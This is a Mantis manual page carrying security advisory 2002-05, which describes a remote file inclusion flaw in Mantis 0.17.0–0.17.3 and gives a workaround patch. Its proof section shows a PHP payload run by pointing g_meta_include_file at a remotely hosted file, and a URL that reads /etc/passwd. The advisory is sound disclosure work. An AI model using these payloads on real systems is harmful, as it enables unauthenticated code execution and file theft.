<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
	<title>2002-05 Arbitrary code execution and file reading</title>
	<link rel="StyleSheet" href="manual.css" type="text/css" />
	<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
</head>
<body>

<table width="100%" border="0" cellspacing="0" cellpadding="3" bgcolor="#ffffff">
<tr>
	<td>
		<a href="http://www.mantisbt.org/manual/"><img border="0" alt="Mantis Logo" src="mantis_logo.gif"></a>
	</td>
	<td>
	</td>
<tr>
	<td class="top-bar" colspan="2">
		Mantis Manual	</td>
</tr>
<tr valign="top">
	<td class="side-menu">
		<a class="root-menu" href="index.html">Manual</a><br />
		<a class="parent-menu" href="manual.appendix.html">Appendix</a><br />
<a class="parent-menu" href="manual.appendix.security.html">Security</a><br />
		<hr size="1" />
		<a class="sibling-menu" href="manual.appendix.security.issues.with.no.security.advisories.html">Issues with no security advisories</a><br />
<a class="sibling-menu" href="manual.appendix.security.2002-01.sql.poisoning.vulnerability.in.mantis.html">2002-01 SQL poisoning vulnerability in Mantis</a><br />
<a class="sibling-menu" href="manual.appendix.security.2002-02.limiting.output.to.reporters.can.be.bypassed.html">2002-02 Limiting output to reporters can be bypassed</a><br />
<a class="sibling-menu" href="manual.appendix.security.2002-03.bug.listings.of.private.projects.can.be.viewed.html">2002-03 Bug listings of private projects can be viewed</a><br />
<a class="sibling-menu" href="manual.appendix.security.2002-04.arbitrary.code.execution.vulnerability.in.mantis.html">2002-04 Arbitrary code execution vulnerability in Mantis</a><br />
<span class="sibling-menu">2002-05 Arbitrary code execution and file reading</span><br />
<a class="sibling-menu" href="manual.appendix.security.2002-06.private.bugs.accessible.in.mantis.html">2002-06 Private bugs accessible in Mantis</a><br />
<a class="sibling-menu" href="manual.appendix.security.2002-07.bugs.in.private.projects.listed.on.view.bugs.html">2002-07 Bugs in private projects listed on 'View Bugs'</a><br />
<a class="sibling-menu" href="manual.appendix.security.2004-01.various.vulnerabilities.in.mantis.html">2004-01 Various vulnerabilities in Mantis</a><br />
		<br />
		
		<hr size="1" />

<p><b>Partner Links</b></p>
<?php include( dirname( __FILE__ ) . DIRECTORY_SEPARATOR . "tla_manual.php" ); ?>
		<hr size="1" />

<!-- Google CSE Search Box Begins -->
  <form id="searchbox_000248769943477040063:fd2hoquhk4k" action="http://google.com/cse">
    <input type="hidden" name="cx" value="000248769943477040063:fd2hoquhk4k" />
    <input name="q" type="text" size="40" />
    <input type="submit" name="sa" value="Search" />
    <input type="hidden" name="cof" value="FORID:0" />
		</form>
  <script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_000248769943477040063%3Afd2hoquhk4k"></script>
<!-- Google CSE Search Box Ends -->
      
			</td>
	<td class="main">

	<table width="100%">
	<tr>
		<td>
			<span class="item-title">2002-05 Arbitrary code execution and file reading</span><br />
			<span class="last-modified">Last Modified: August 11, 2003 00:08AM</span>
		</td>
	</tr>
	<tr>
		<td class="applicable-version">
			(Mantis 0.17.0 till 0.17.3)
		</td>
	</tr>
	<tr>
		<td class="description">
			<span class="description">Description</span>
			<br /><br />
			<span class="bold">  0. Table of Contents</span><br />
<br />
    1. Introduction<br />
    2. Summary / Impact analysis<br />
    3. Affected versions<br />
    4. Workaround / Solution<br />
    5. Proof of Vulnerability<br />
      5.1 Arbitrary code execution<br />
      5.2 Displaying local files<br />
    6. Credit<br />
    7. Contact details<br />
<br />
<span class="bold">  1. Introduction</span><br />
<br />
Mantis is an Open Source web-based bugtracking system, written in PHP, which<br />
uses the MySQL database server. It is being actively developed by a small<br />
group of developers, and is considered to be in the beta stage.<br />
<br />
<span class="bold">  2. Summary / Impact analysis</span><br />
<br />
Mantis allows the user to configure a file to be included at the top or<br />
bottom, a file which contains the CSS stylesheets and a file which contains<br />
meta tags. These files are set in default/config_inc2.php, and can be<br />
overridden in config_inc.php.<br />
<br />
For some obscure reason, config_inc2.php only initialised the variables if<br />
it wasn't already set. This means that someone can set either<br />
$g_bottom_include_page, $g_top_include_page, $g_css_include_file or<br />
$g_meta_include_file using GET/POST parameters, or through a cookie.<br />
<br />
Not all of these can be exploited to execute arbitrary code but all of them<br />
can be used to read any file on the server readable to the webserver user.<br />
<br />
Mantis 0.17.4 removes the isset() checks from default/config_inc2.php and<br />
checks whether any of the four variables were set by a user. The latter<br />
checks are added to ensure that even when someone has used<br />
default/config_inc2.php to set configuration values, this vulnerability will<br />
still be closed.<br />
<br />
Mantis installations which override all of the four previously mentioned<br />
variables in their config_inc.php are not affected.<br />
Note that an account to the Mantis installation is not required to exploit<br />
this vulnerability, as login_page.php and core_html_API.php are vulnerable<br />
as well.<br />
<br />
<span class="bold">  3. Affected versions</span><br />
<br />
The following versions are known to be affected:<br />
  Mantis 0.17.3<br />
  Mantis 0.17.2<br />
  Mantis 0.17.1<br />
  Mantis 0.17.0<br />
<br />
The following versions are known to be unaffected:<br />
  Mantis 0.17.4a<br />
  Mantis 0.17.4<br />
  Any version below Mantis 0.17.0 (*)<br />
<br />
* = Except when the mentioned variables are not initialised anywhere, which<br />
shouldn't occur if a seperate config_ing.php file is used.<br />
<br />
<span class="bold">  4. Workaround / Solution</span><br />
<br />
Mantis 0.17.4 removes the isset() checks, and some paranoia checks which<br />
prevent this vulnerability.<br />
All users are recommended to upgrade to this version as soon as possible.<br />
<br />
If an upgrade is not possible, the vulnerability can be closed by inserting<br />
the following lines in core_API.php:<br />
<div class="code">
  if ( isset($HTTP_GET_VARS['g_top_include_page']) ||
    isset($HTTP_POST_VARS['g_top_include_page']) ||
    isset($HTTP_COOKIE_VARS['g_top_include_page']) ) {
    exit;
  }

  if ( isset($HTTP_GET_VARS['g_bottom_include_page']) ||
    isset($HTTP_POST_VARS['g_bottom_include_page']) ||
    isset($HTTP_COOKIE_VARS['g_bottom_include_page']) ) {
    exit;
  }

  if ( isset($HTTP_GET_VARS['g_css_include_file']) ||
    isset($HTTP_POST_VARS['g_css_include_file']) ||
    isset($HTTP_COOKIE_VARS['g_css_include_file']) ) {
    exit;
  }

  if ( isset($HTTP_GET_VARS['g_meta_include_file']) ||
    isset($HTTP_POST_VARS['g_meta_include_file']) ||
    isset($HTTP_COOKIE_VARS['g_meta_include_file']) ) {
    exit;
  }
</div>
<br />
<span class="bold">  5. Proof of Vulnerability</span><br />
<br />
<span class="bold">    5.1 Arbitrary code execution</span><br />
<br />
To execute arbitrary PHP code using this vulnerability, an attacker only has<br />
to store the PHP code (s)he wishes to execute in a textfile, make this<br />
available on a webserver accessible by the Mantis installation and point the<br />
$g_meta_include_file or the $g_css_include_file variable to that location.<br />
<br />
For example, we create a file with the following content:<br />
<div class="code">
  &lt;?php
    system('ls');
    exit;
  ?&gt;
</div>
<br />
We make this file available on a webserver, for example at<br />
http://server.mynetwork.net/listings.txt<br />
If the Mantis installation does not have access to the internet, the file<br />
should be stored on an internal server.<br />
<br />
We then point our browser to<br />
http://mantis.server.com/mantis/login_page.php?g_meta_include_file=http://server.mynetwork.net/listings.txt<br />
Any Mantis page that displays something will do. However, login_page.php<br />
does not require an account.<br />
<br />
This will execute the following call:<br />
  include('http://server.mynetwork.net/listings.txt');<br />
<br />
This instructs PHP to download listings.txt and parse it as a PHP script. In<br />
this case, the browser should print a file listing of the current directory.<br />
<br />
<span class="bold">    5.2 Displaying local files</span><br />
<br />
It is also possible to view any file available to the web user. The method<br />
is more or less the same, although in this case we do not let the server<br />
include a file we wrote, but just a local file we specify:<br />
<br />
http://mantis.server.com/mantis/login_page.php?g_css_include_file=/etc/passwd<br />
<br />
This will display the specified file if the webserver user has permission to<br />
read that file.<br />
<br />
This vulnerability can be exploited using any of the 4 variables specified<br />
in section 2.<br />
<br />
<span class="bold">  6. Credit</span><br />
<br />
This vulnerability was reported by Andrew Johnson and independently by the<br />
Debian Security Team.<br />
<br />
<span class="bold">  7. Contact details</span><br />
<br />
The latest version of Mantis is always available from:<br />
    <a href="http://mantisbt.sourceforge.net/">http://mantisbt.sourceforge.net/</a><br />
The current version is 0.17.4a, which can be downloaded from<br />
    <a href="http://mantisbt.sourceforge.net/download.php3">http://mantisbt.sourceforge.net/download.php3</a><br />
<br />
If you have any questions about this vulnerability, or wish to report<br />
another, you can contact the developers at:<br />
    <a href="mailto:mantisbt-security@lists.sourceforge.net">mailto:mantisbt-security@lists.sourceforge.net</a><br />
This is a private mailinglist, readable only by a few developers.<br />
<br />
The latest version of this and other advisories can be found at:<br />
    <a href="http://mantisbt.sourceforge.net/security.php3">http://mantisbt.sourceforge.net/security.php3</a>					</td>
	</tr>
	</table>

	</td>
</tr>
</table>

<!-- Google Analytics -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-330112-5";
urchinTracker();
</script>
<!-- End of Google Analytics -->

</body>
</html>
